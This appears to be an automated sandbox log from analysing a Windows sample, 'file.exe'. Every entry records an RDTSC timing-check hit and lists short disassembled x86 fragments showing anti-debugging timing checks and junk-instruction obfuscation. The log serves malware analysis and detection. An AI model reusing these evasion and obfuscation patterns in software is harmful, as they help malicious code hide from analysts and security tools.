                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10876AC second address: 10876D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0640D82079h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10876D5 second address: 1087730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0640516B3Fh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0640516B38h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F0640516B3Eh 0x0000002b and di, 4E1Dh 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D2DCAh] 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1087884 second address: 1087889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089502 second address: 108950C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108950C second address: 108956C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D2A87h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0640D82068h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d pushad 0x0000002e call 00007F0640D8206Dh 0x00000033 push edx 0x00000034 pop ebx 0x00000035 pop edx 0x00000036 jmp 00007F0640D8206Eh 0x0000003b popad 0x0000003c push 00000000h 0x0000003e mov bl, cl 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108956C second address: 1089576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089576 second address: 1089599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B6C5 second address: 108B6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B6C9 second address: 108B6E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82073h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B6E6 second address: 108B700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B46h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D6CC second address: 103D6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D6D2 second address: 103D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D6DC second address: 103D6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A8B4 second address: 108A8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B825 second address: 108B82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A8BE second address: 108A8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EDDF second address: 108EDFA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0640D82068h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0640D8206Ch 0x00000013 jnp 00007F0640D82066h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A8C2 second address: 108A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F0640516B4Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0640516B38h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push dword ptr fs:[00000000h] 0x00000031 pushad 0x00000032 mov ecx, 224B89CDh 0x00000037 popad 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f clc 0x00000040 mov eax, dword ptr [ebp+122D1489h] 0x00000046 je 00007F0640516B3Ch 0x0000004c add dword ptr [ebp+122D2FC4h], ecx 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ebp 0x00000057 call 00007F0640516B38h 0x0000005c pop ebp 0x0000005d mov dword ptr [esp+04h], ebp 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc ebp 0x0000006a push ebp 0x0000006b ret 0x0000006c pop ebp 0x0000006d ret 0x0000006e nop 0x0000006f jne 00007F0640516B44h 0x00000075 push eax 0x00000076 jng 00007F0640516B3Eh 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D4 second address: 108B8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D8 second address: 108B8E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090DC8 second address: 1090E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0640D82068h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 or ebx, dword ptr [ebp+122D370Ah] 0x00000028 jmp 00007F0640D82074h 0x0000002d push 00000000h 0x0000002f jmp 00007F0640D82072h 0x00000034 push 00000000h 0x00000036 and ebx, dword ptr [ebp+122D19CDh] 0x0000003c xchg eax, esi 0x0000003d jmp 00007F0640D8206Ah 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F0640D82077h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8E2 second address: 108B8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E4A second address: 1090E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E4F second address: 1090E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090E55 second address: 1090E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10920FB second address: 1092101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E72 second address: 1099EB3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0640D82066h 0x00000008 jns 00007F0640D82066h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F0640D8206Dh 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F0640D8207Fh 0x00000020 jmp 00007F0640D82079h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DF2E second address: 109DF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F25 second address: 1034F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0640D8206Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F36 second address: 1034F43 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F43 second address: 1034F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0640D82066h 0x0000000a ja 00007F0640D82066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F55 second address: 1034F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F62 second address: 1034F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034F66 second address: 1034F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A38E7 second address: 10A38ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A38ED second address: 10A3918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F0640516B3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jnl 00007F0640516B36h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 jc 00007F0640516B36h 0x0000001e jnl 00007F0640516B36h 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A3918 second address: 10A391D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4542 second address: 10A4552 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4552 second address: 10A4556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4AA8 second address: 10A4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9186 second address: 10A918A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A918A second address: 10A91AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640516B40h 0x0000000b popad 0x0000000c jnp 00007F0640516B58h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91AB second address: 10A91AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91AF second address: 10A91B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91B9 second address: 10A91BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A91BD second address: 10A91C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9988 second address: 10A9998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9998 second address: 10A99B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0640516B3Dh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007F0640516B36h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A99B9 second address: 10A99C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0640D82066h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9DB8 second address: 10A9DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA06C second address: 10AA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 jne 00007F0640D82066h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA091 second address: 10AA095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA095 second address: 10AA0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d js 00007F0640D8208Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F0640D82066h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA0B2 second address: 10AA0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8EF9 second address: 10A8EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8EFD second address: 10A8F03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F03 second address: 10A8F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F09 second address: 10A8F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F23 second address: 10A8F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8F2C second address: 10A8F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0640516B36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3E4 second address: 10AF3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0640D8206Ch 0x0000000b jp 00007F0640D82066h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3F9 second address: 10AF3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3FD second address: 10AF401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF709 second address: 10AF723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0640516B36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF723 second address: 10AF727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF882 second address: 10AF886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA12 second address: 10AFA38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82072h 0x00000007 jg 00007F0640D82066h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F0640D82066h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA38 second address: 10AFA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA3C second address: 10AFA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640D82070h 0x0000000b pushad 0x0000000c jg 00007F0640D82066h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFD40 second address: 10AFD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFD44 second address: 10AFD48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BCC4B second address: 10BCC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0640516B36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078419 second address: 107845E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 032C1694h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0640D82068h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a stc 0x0000002b push 95284CBCh 0x00000030 jng 00007F0640D8208Ah 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107845E second address: 1078462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078559 second address: 107856D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F0640D82068h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107856D second address: 1078571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078571 second address: 1078575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078575 second address: 10785B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jng 00007F0640516B36h 0x0000000d pop ecx 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 mov edx, 3C330844h 0x00000015 pushad 0x00000016 sub dword ptr [ebp+1245EFE5h], ebx 0x0000001c jnl 00007F0640516B3Ch 0x00000022 js 00007F0640516B36h 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0640516B44h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078696 second address: 10786A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10786A0 second address: 10786A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10788BF second address: 1078944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F0640D8206Ch 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F0640D82068h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 cld 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F0640D82068h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 xor dl, FFFFFFA5h 0x00000047 nop 0x00000048 push ebx 0x00000049 push ebx 0x0000004a pushad 0x0000004b popad 0x0000004c pop ebx 0x0000004d pop ebx 0x0000004e push eax 0x0000004f pushad 0x00000050 jmp 00007F0640D82079h 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078D04 second address: 1078D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078D0A second address: 1078D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10790C0 second address: 10790D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10790D2 second address: 1079111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, 140CBB15h 0x00000013 lea eax, dword ptr [ebp+1248DBAFh] 0x00000019 add edx, 162EF136h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0640D8206Ch 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079111 second address: 107911B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107911B second address: 107911F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
